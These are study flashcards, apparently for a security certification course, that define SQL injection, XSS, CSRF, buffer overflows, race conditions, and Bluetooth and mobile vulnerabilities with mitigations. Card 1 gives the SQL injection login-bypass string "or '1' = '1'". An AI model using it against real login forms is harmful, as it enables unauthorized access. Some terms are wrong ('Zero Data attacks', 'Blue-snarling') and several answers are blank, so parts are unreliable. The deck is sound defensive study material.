Section - 18 - Vulnerabilities and attacks Flashcards

1
Q

What is an SQL injection attack?

A

It is an attack in which an attacker send malicious SQL queries to SQL databases through website input forms or URL parameters.

It happens when the attacker sends these SQL queries and servers don’t validate the input or sanitize the input. It can lead to unauthorized access to sensitive data.

Ex = “or ‘1’ = ‘1’” <- this is send through a user_name/password page

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What are URL parameters?

A

URL Parameters are used to filter and find information on webpages easily.
URL parameters starts with “?” and had key/value pairs that might be separated by “&”

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What are 3 types of SQL injection attacks?

A
  1. In-band SQL injection attack - The attacker gets the output from the same interface from which attack was initialized.
  2. Out-of-band SQL injection attack
  3. Inferential SQL injection attack - In this attack, attacker doesn’t get an direct output but instead get some information about the database that he can use to conduct his main attack.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What is XML injection attack?

A

It is targeted at applications or XML parsers that process XML data.
These applications or XML parsers might get data from Web forms or other API interfaces that attackers can exploit if the input from these sources is not sanitized or validated.
In this attack, an attacker inserts an malicious XML script into the XML processing application.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What are 2 specific types of XML attacks that DION taught?

A

XML bomb attack (also known as Billion Laughs attack) - In this attack, attacker exploits the way XML parsers process entity references in XML documents.

XML External Entity (XXE) - In this attack, the attacker exploits the way XML parser handles external entity references in XML documents.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What is a cross-site scripting attack?

A

It is an attack in which a threat actor injects malicious script, typically written in Java script, into web pages viewed by other users.
With this attack, an attacker can steal personal information from clients or hijack their sessions or install malware in client system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What are different types of cross-site scripting attacks?

A

Reflected XSS - in this attack, the threat actor crafts a URL with malicious script in it and somehow lures his victim into clicking on his link.
The web server that is vulnerable to these attacks will reply to the client with this malicious script in their response.
The client trusts the response from this trusted site and will run the malicious script.

Stored XSS attack -

DOM based XSS attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What are Stored XSS attack and DOM-based XSS attack?

A

Stored XSS attack - in this attack, the threat actor injects the malicious script directly into the server and when any client visits this infected site, they get infected too.

DOM-based XSS attack - DOM stands for Document Object model - This XSS attack occurs on the client side.
In this attack, the threat actor injects some malicious code into the Document Object model in clients browser.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

From a log data, how can we know if some attack is a XSS (Reflected or Stored) attack?

A

If the log data has some kind of “Java script” in it, that means it is an Reflected or Stored XSS attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

From a log data, how can we know if some attack is DOM-based XSS attack?

A

In the log data, if we see something [document.something], most likely it is an DOM XSS attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

What is cross-site request forgery (CSRF) attack?

A

In this attack, the threat actor tricks his victim into sending some malicious request (without the knowledge of victim) into the trusted webserver where user is authenticated.
This request can be to update email address, reset password etc.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

How does Cross Site request forgery attack works?

A
  1. The victim authenticates to a website and establishes the connection.
  2. The attacker crafts a malicious webpage or a email with malicious link or form, that when clicked or submitted, sends the malicious request to the server.
  3. The attacker tricks the victim into clicking on the link
  4. the trusted website runs this malicious request assuming that it came from right source.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What are cookies and what are its 2 types?

A

Cookies are just like text files that contain users information about the web session with some web-server.

There are 2 types of cookies

  1. Non-persistent - these are also called session cookies. This cookie type only remains active while the clients session is active with web-server and this cookie type only stays in the memory.
  2. Persistent cookie - These are stored in the browser cache until deleted or expired.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What is DOM?

A

DOM stands for Document Object model.
It is a model that can represent different data structures like HTML, XML in tree like structures.
DOM makes easy to work with HTML, XML data.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What is a session prediction attack?

A

It is a type of spoofing attack in which an attacker attempts to predict the session token to hijack the session.

This attack is successful on those servers that do use algorithms that do not create random session tokens for each connection request.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What is Function call stack?

A

When a function is called within a program, the CPU needs to keep track of where execution should return to after the function completes. This information is stored in a data structure (in buffer memory) called the function call stack.

17
Q

What is an Buffer Over Flow attack?

A

It is an attack in which an attacker sends more data to the application buffer than it can handle, resulting in excess data overflowing to other buffers.

This over-flown data might overwrite critical components of other programs like their return pointer.
Because of this the other program using the next buffer might be pointed to the malicious code and might execute this malicious code.

18
Q

What is Smashing the Stack attack?

A

It is a specific type of Buffer over flow attack that occurs when can attacker can execute his malicious code by overwriting the return address of some program in the function call stack.

19
Q

Give me one example of mitigation technique to protect against Buffer Over flow attack?

A

ASLR - Address Space Layout Randomization -
In this technique, different components of programs/applications (Like function call stack, executable code, libraries) are allocated buffer memory in a random manner every time they are executed. This makes much harder for an attacker to predict the memory addresses where vulnerable code or data structures reside.

20
Q

What are Race condition attacks?

A

In this attack, an attacker exploits the vulnerabilities related to resource TOC (Time of Check), TOU (Time Of Use), TOE (Time of Evaluation)

21
Q

What is one common method to protect against Race condition attacks?

A

We can make use of Locks (Like locking the editing of file to one user only while it is used by this user) and Mutexes

Mutex - It is a mutually exclusive flag that acts as a gatekeeper to a section of code so that only one thread can be processed at a time. But sometimes it can lead to Deadlocks.

22
Q

What are different kinds of hardware vulnerabilities?

A
  1. Unpatched system
  2. Legacy system/ End-of-life systems/ unsupported systems
  3. Firmware vulnerabilities
  4. Default Hardware configurations or misconfigurations
23
Q

What are different techniques to protect from Hardware vulnerabilities?

A
  1. System hardening - We perform hardening by removing/stopping any unneeded ports and services. And by setting up proper permissions.
  2. Patching - There should be a good Patch management system in the organization that will look after all the patch management work.
  3. Do regular audits to find any Hardware misconfigurations.
  4. Train employees on how to securely use systems
  5. Decommissioning - If we have unsupported systems, they should be decommissioned.
  6. Isolation - If some legacy system is a core component of our enterprise and can’t be decommissioned, we should implement isolation mechanisms for this device.
  7. Segmentation of network.
24
Q

What are common Bluetooth Vulnerabilities?

A

In-secure pairing - when proper authentication techniques are not implemented by Bluetooth devices for pairing.

On-path attack -

Device spoofing - some attacker might spoof the name and IP of a legit device with the hopes of pairing with some other device.

25
Q

What is Bluejacking and Blue-smacking attack?

A

Bluejacking - In this attack, the threat actor sends unsolicited messages to a victim’s device either to bother him or to find other Bluetooth-related vulnerabilities in that device.

Blue-smacking - It is a kind of DOS attack bluetooth devices.

26
Q

What is Blue-snarling and Blue-bugging attack?

A

Blue-snarling attack - In this attack, an attacker exploits some Bluetooth vulnerability on a victim’s device and is able to gain access to his devices. For example - Access to calls logs, messages, phone-book etc.

Blue-bugging - In this attack, an attacker exploits some Bluetooth vulnerability and is able to take control of victims device and is able to make phone calls, send messages or access internet from victims device.

Blue-borne

27
Q

What are few ways to protect from Bluetooth attacks?

A
  1. Turn Off the Bluetooth when not needed
  2. Set the device to be in “Non-discoverable mode”
  3. Regularly update device (Firmware update as well)
  4. Only pair with trusted devices
  5. Use unique keys to authenticate
  6. Use encryption for sensitive data transfer.
28
Q

What are few vulnerabilities related to mobile devices?

A
  1. Sideloading - in this vulnerability, users or malicious users download and install application from unsecure sources. For example - directly downloading the application from Google that bypasses the security checks of play store and app store.
  2. Jail breaking - It is the process that gives escalated privileges to users on devices and allows users to by-pass built in security measures provided by the devices.
    Why they might do it - It can be to install some application that is normally not allowed to run like some pirated application/game.
  3. Insecure connection methods -

Uses MDM (Mobile Device Management) solution in a enterprise network.

29
Q

What are few vulnerabilities related to Operating systems?

A
  1. Unpatched systems
  2. Default configurations/ misconfigurations
  3. Zero Data attacks - Deploy HIPS
  4. Data exfiltration -
  5. Malicious Update - only install updates from official channels and maintain application allow-list.